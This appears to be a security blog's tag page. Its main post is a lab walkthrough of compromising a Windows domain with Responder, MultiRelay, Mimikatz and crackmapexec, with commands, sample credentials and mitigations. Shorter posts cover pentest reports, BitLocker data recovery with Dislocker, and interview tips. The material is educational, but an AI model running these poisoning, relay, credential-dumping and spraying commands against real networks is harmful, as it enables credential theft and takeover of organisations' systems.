Tag: infosec

Responder -> MultiRelay -> Mimikatz -> Crackmapexec ->Windows PWNage

GameOfPWNZ

For this post, we’re going to do a scenario-based usage of the following tools: responder, MultiRelay.py, mimikatz, and crackmapexec.

This post gained influence from “Skip Cracking Responder Hashes and Replay Them” by Dank Panda (Richard De La Cruz of Tevora).

The Scenario:

We are on the internal network of a Windows domain.
Users are Local Administrators on local workstations.
Domain Administrators have separate admin accounts from their normal accounts, but login with their Domain Administrator account on the same workstation.
We have already scanned the network with NMap and have found the live hosts.
SMB Signing is disabled on workstations
WDigest is on.
LLMNR is enabled.

The Environment:

OS: Windows Server 2008
IP: 10.0.2.15
Services: Active Directory Directory Services, DNS
Logged On Users: kcharles (domain administrator)

OS: Windows 7
IP: 10.0.2.4
Services: Local workstation
Logged On Users: sleaf (domain user/local administrator), sleafadmin (domain administrator)

OS: Windows 7
IP: 10.0.2.5
Services: Local Workstation
Logged On users: jegghead (domain user/local administrator)

OS: Kali Linux
IP: 10.0.2.6
Services: This is our attack machine.
Logged On Users: me 😉

Setting up our attack machine:

Do the usual (eg, apt-get update, apt-get upgrade)
Install crackmapexec: apt-get install crackmapexec

Let’s do this!

First, let’s setup responder. We’ll have to edit the responder settings to turn off HTTP and SMB. In Kali Linux, it can be found here: /usr/share/responder and will be named Responder.conf

We can go ahead and turn responder on. We’ll be using the flags: -I and -rv.

You can see what interface you’re using by using ifconfig:

Alright, now let’s startup responder.

responder -I eth0 -rv

If we wanted to check for machines on the subnet with SMB signing not enabled, we can use RunFinger.py which is in the responder toolset. On Kali Linux, you can find it at:

/usr/share/responder/tools named RunFinger.py

And all you’d do is:

python RunFinger.py -i 10.0.2.0/24

Now, let’s setup MultiRelay.py. This is a tool in the responder toolset. You can find it in Kali Linux at:

/usr/share/responder/tools named MultiRelay.py

We’ll start MultiRelay by pointing it at a target (-t) and using all users (-u ALL).

python MultiRelay.py -t 10.0.2.4 -u ALL

Remember that sleaf and sleafadmin are logged into this Windows 7 machine.

Now, anyone who has used Responder knows that it can take a bit to get any good traffic. We’d be waiting for someone to try to access something we can poison, so for the purpose of this demo, we’re going to have jegghead navigate to a share that doesn’t exist.

You’ll see that responder picks up on this LLMNR and poisons the request.

Now, we’ll see in our MultiRelay.py output that we’ve successfully poisoned the LLMNR request and relayed the hash of jegghead to 10.0.2.4 where she had local administrator. We now have LocalSystem privileges on 10.0.2.4.

From here, we can run commands built-in to this Responder interactive shell. For this demo, we are going to run Mimikatz.

We can do this within the shell by doing: mimi sekurlsa::logonpasswords

Here we get sleaf’s password:

And because sleaf used their admin account on the same machine, we get sleafadmin:

Woot woot. Now, we have the credentials of a domain administrator!

So, now we’ve used responder, multirelay, and mimikatz.

So why don’t we just use these credentials to remote desktop? We could if available. We can do many things. We could use Powershell sessions, wmic, and more but for now, we’ll use crackmapexec since it’s run in memory or items that aren’t often audited or monitored.

This next tool is called crackmapexec and it can be used for many uses, but we’ll focus on a few.

Let’s spray our credentials to find who’s logged in where.

We can do this by pointing crackmapexec at the subnet and passing the creds:

crackmapexec 10.0.2.0/24 -u ‘sleafadmin’ -p ‘P@ssw0rd’ –lusers

This is definitely useful if we know that the user we have compromised has local administrator on all local workstations. Let’s say sleaf was an admin that didn’t login to her admin account on her local workstation. We could use jegghead’s account to spray around the subnet looking for an admin that did.

We could also spray mimikatz trying to get credentials. To show that all you need is local administrator on the machines, we’ll use jegghead’s account. The machines that show “(Pwn3d!)” next to them mean that she’s local administrator on that machine.

crackmapexec 10.0.2.0/24 -u ‘jegghead’ -p ‘1upGirl!’ -M mimikatz

The reason you’re seeing “Waiting on x host(s)” is because the network is slow, but you’ll see jegghead was local administrator on the workstations but not the server.

Now, let’s look at some of the other features.

With the -x switch, we can run commands directly on the machine we target. We’ll be targeting the server (10.0.2.15). We’ll be running a command to ping us (10.0.2.6). I’ll have wireshark up to show the icmp packets coming back to our attack machine.

crackmapexec 10.0.2.15 -u ‘sleafadmin’ -p ‘P@ssw0rd’ -x ‘ping 10.0.2.6’

And here’s the wireshark capture:

So, there we are. A few examples of the usage of crackmapexec.

So in this demo, we’ve used responder, runfinger, multirelay, mimikatz, and crackmapexec.

Why Things Work

Remember our scenario.

Let’s go over some definitions and some quick additional information.

LLMNR (Link-Local Multicast Name Resolution) – This is a protocol based on DNS.  When trying to find a host, a Windows machine will check its host file then DNS and then LLMNR. LLMNR is limited in that it is not routable. This means only machines on the same subnet can use it. Responder essentially waits for a Windows machine to be like “Who’s X?” and Responder will be like “Oh, I’m X.” If successful, the victim will send their NTLM/NTLMv2 hashed credentials to the attacker.

SMB (Server Message Block) – This is an application layer network protocol. This protocol is mostly used for accessing shares and printers. It can run over TCP on port 445 or via NetBIOS UDP Port 137, 138 and TCP ports 137 and 139. It can also run over legacy protocols, but we won’t cover that.

NetBIOS – This  allows apps and computers on a LAN to communicate with network hardware and send data across the network.

NTLM – NT Lan Manager v2 – This is a challenge-response authentication protocol.

Wdigest – This is a protocol for sending cleartext credentials to HTTP and Simple Authentication Security Layer (SASL) applications.

Crackmapexec – This is a post-exploitation tool that allows for connecting and authenticating to multiple hosts at the same time. Everything is either run in memory, use the WinAPI calls or using the built-in Windows features.

Mimikatz – This is a post-exploitation tool that’s known for extracting plaintext passwords, hashes, and kerberos tickets from memory. “Mimikatz can also perform pass-the-hash, pass-the-ticket or build Golden tickets”

Responder – “A LLMNR, NBT-NS and MDNS poisoner, with built-in HTTP/SMB/MSSQL/FTP/LDAP rogue authentication server supporting NTLMv1/NTLMv2/LMv2, Extended Security NTLMSSP and Basic HTTP authentication. “

Mitigations

Now, let’s talk how protect your organization!

  1. Make SMB Signing mandatory. Tools like crackmapexec may be able to turn this off, but you can set up auditing of this registry key so at least you have that measure. Keep in mind that some printers do not support SMB signing and that it might add some network overhead.
  2. Disable Wdigest on older machines. Newer machines (Win8/Win10/Server2k12/Server2k16) should not be vulnerable by default. Enable auditing of the registry key.
  3. Limit who has local administrator on their machines.
  4. Limit where domain administrators can login.

Thanks. If you have any questions, use my contact form or the comments section. Let me know if you liked this post.

Writing A Penetration Test Report

GameOfPWNZ

Penetration testing can be fun. You get to PWN all the things. You get to solve puzzles. But when it is all done, it’s time to write the report for the client.

If you’ve never written a penetration test report, this post is for you. What I did is exploited SOME of the vulnerabilities in Metasploitable 2 and created a sample penetration test report.

The sample report: http://gameofpwnz.com/uploads/documents/Metasploitable_Report.docx

Here are some things to make sure you include:

  • Executive Summary (Keep in mind who your audience is)
  • Scope (This should have been determined during pre-engagement)
  • Methods (What is your penetration methodology or formula?)
  • Risk Rating (A risk rating is important in determining which risks need to be mitigated and which could possibly be accepted)
  • Impact (What happens if an attacker exploits the vulnerability?)
  • Remediation (Exploitation is fun, but we need to help the blue team know what the corrective actions would be to mitigate the issue)

Screenshots and steps to reproduce are great for showing the client how you were able to exploit the vulnerability. It also allows the client to check their fixes when they try to reproduce.

This report template is not the actual report template I use in penetration testing, but it’s something I’m willing to share. Feel free to use it. Also, feel free to leave comments about what else you think should be added or any other recommendations.

 

Dislocker USB with Bitlocker (LAB)

GameOfPWNZ

This lab will take you through using Dislocker to view data on a USB disk image that has Bitlocker encryption.  The password for Bitlocker will be provided.

 

Real life use: Hard drive with Bitlocker fails to boot.  You need to recover data from it.

 

Bitlocker USB DD image: https://drive.google.com/a/gameofpwnz.com/file/d/0B3KtykBk15nNamdMSVpYaXRPRlU/view?usp=sharing

MD5 Checksum: 90860ff85a78f1421e6f26f44c10b8ae

In Kali, you can use this to get the mount 🙂 :

losetup --partscan --find --show encrypted.001

The Bitlocker Password is password

Use this Procedure: https://gameofpwnz.com/dislocker-recovering-data-from-drive-with-bitlocker-requires-bitlocker-recovery-key-or-password/

The procedure can be altered slightly for this lab.  I used a Kali Linux Virtual Machine instead of a live USB to complete this lab.  In this lab, I use the password rather than the recovery key.  Notice the slight difference in the command when using each.

 

Lab created by @GameOfPWNZ

Dislocker: Recovering Data from Drive with Bitlocker – Requires Bitlocker Recovery Key or Password

GameOfPWNZ

This procedure is for recovering data from a disk drive with Microsoft Bitlocker Full Disk Encryption when the drive no longer boots.

Also, a lab for practicing this procedure will be provided here: https://gameofpwnz.com/dislockerlab/

Required tools

 

Procedures

  1. Make sure the hard drive with Bitlocker is connected. If you never removed it, then you’re good.
  2. Boot from Kali Linux Live USB or CD/DVD.
  3. Update:
    apt-get update
  4. Install git and dependencies:
    apt-get install git libfuse-dev libmbedtls-dev cmake

5. Git clone Dislocker:

git clone git://github.com/Aorimn/dislocker.git

6. Change working directory to the dislocker directory

cd dislocker

7. cmake the Dislocker directory

cmake .

8. Make and make install

  1. make
  2. make install

9.Find the drive with Bitlocker

fdisk -l (should look like /dev/sda# if SATA/SCSI)

10. Create directories tmp and dis

  1. mkdir /mnt/tmp
  2. mkdir /mnt/dis

11. Run Dislocker

  1. Using Recovery Key: dislocker -v -V /dev/(whichever is the one you found in Step 9) -p<Bitlocker Recovery Key> — /mnt/tmp
    1. Hopefully you saved your recovery key in Active Directory or somewhere you know. The Recovery key is 55 characters with the hyphens.
  2. Using Bitlocker Password: dislocker -v -V /dev/(whichever is the one you found in Step 9) -u<Bitlocker Password > — /mnt/tmp

12. Check if it worked

ls /mnt/tmp     (You should see a dislocker-file. If so, then it worked)

13. Mount the volume

mount -o loop,ro /mnt/tmp/dislocker-file /mnt/dis

14. Change working directory to the volume

cd /mnt/dis

15. List out directory listing

ls

16. Backup files

To make this easier, open up the GUI file explorer window (2x). In one, open the USB drive. In the 2nd, open up /mnt/dis. Then copy the files that you need to the USB.

17. Profit

If you found this tutorial useful, let me know in the comments 🙂 And make sure to check out the lab 🙂

References

 

http://www.alexandreviot.net/2015/06/10/active-directory-how-to-display-bitlocker-recovery-key/

https://technet.microsoft.com/en-us/library/dd759200(v=ws.11).aspx

Wireless Shack Doc – CD/DVD

Null-Byte Doc

Kali Doc

https://github.com/Aorimn/dislocker

https://linux.die.net/man/1/dislocker

https://askubuntu.com/questions/617950/use-windows-bitlocker-encrypted-drive-on-ubuntu-14-04-lts

Interviews For Beginners – Guide/Opinion/Advice

GameOfPWNZ

If you’re seasoned at interviews and you’re constantly getting offers, this post is not for you. This post is for the people who can’t seem to get an offer or feel like they are dropping the ball when it comes to interviews. I’m not a hiring manager of any sort, but I have some advice and tips I’d like to share.

First, let’s start with what I feel is the biggest part of the interview: Know your audience. This is true for an interview and any presentation/talk. In an interview, you are a salesman. You’re selling yourself. But knowing who you’re selling to will help determine diction and depth of explanation. So, who’s giving you the interview? Possible future colleagues? Possible future manager? HR? This will determine how technical you should get.

Now, let’s talk about the “I don’t know” responses. It’s fine not to know everything thrown to you in an interview, especially if you’re fresh; however, I would not suggest answering with a simple “I don’t’ know.” For most questions, it’s not about seeing if you 100% know the answer, but the process of you trying to figure out the answer. “I’m not entirely sure, but knowing process A and process B and little of process C and how they relate, this seems like a possible solution” sounds a lot better than “I don’t know.” You may be off, but it shows that you put some thought into a question and had a bit of troubleshooting techniques into your answer. You want to know how processes relate. Also, don’t be scared to think out loud. It is encouraged. You shouldn’t have a long pause. Talk yourself through a problem. Remember that in the real world, you’ll most likely have Google-Fu to use.

That brings me to my next point. Don’t cheat. If you’re asked a question in a phone or Skype interview, don’t start hacking away at your keyboard. The interviewer can hear! If it is something that you’d need to Google, say that. Nobody is impressed with cheaters and liars. You know when you were in school and your teacher said you wouldn’t have a calculator at any time. Well, that’s not true, but you learned the processes better without a calculator. The interviewer knows the strengths of Google and Google-Fu is a really good skill to have, but don’t try to pass it off as remembered knowledge.
Now, I’m not going to focus on what to wear too much. You should know the popular opinion. Don’t wear red. Dress appropriately (slacks, dress shirt, dress shoes, tie, maybe suit). But remember to look neat. I’ve seen wrinkled suits. Get it pressed. Iron or steam your shirts. Why go through the effort of wearing nice clothes if you’re going to look sloppy. Tuck in your shirt. Buy clothing that fits you. Baggy clothing looks sloppy. Be clean shaven. Keep your hair neat.

Be yourself. Unless you’re a horrible person haha. People want to hire someone that is knowledgeable and someone they feel like they’d get along with. You’re going to see each other a lot, so you don’t want to clash often.
Ask questions! It shows you’re interested and shows that you’re not afraid to ask questions. What would a typical day be like in the position? What is the work culture like? What type of growth plan does the organization offer? What type of mentorship program does the organization offer? How big is the team that would be working with you? Remember that while the interview is important in selling yourself, the organization is also silently selling themselves. That means if you’re the right candidate for them, you have to find if they’re the right organization for you.
Take notes. It’ll help you come up with follow up questions. It’ll also help you look up stuff later that you didn’t know during the interview.

Be prepared to answer anything about your resume. Don’t lie on your resume. If something is listed as a core strength on your resume, you better know it.

Be prepared to answer questions that relate to the job posting. The job posting would discuss some of the responsibilities that you’d have in the position. Do you actually know them? Make sure you do or at least can be trained pretty easily.
Now, eye contact. It’s very important. Don’t keep your head down. Keep focused. If you have multiple interviewers, don’t just focus on the one that asked you the question. It’s like a presentation. You’re not just addressing one person. You’re addressing them all.

Those are some tips/advice or whatever you want to call it. Comment what you think.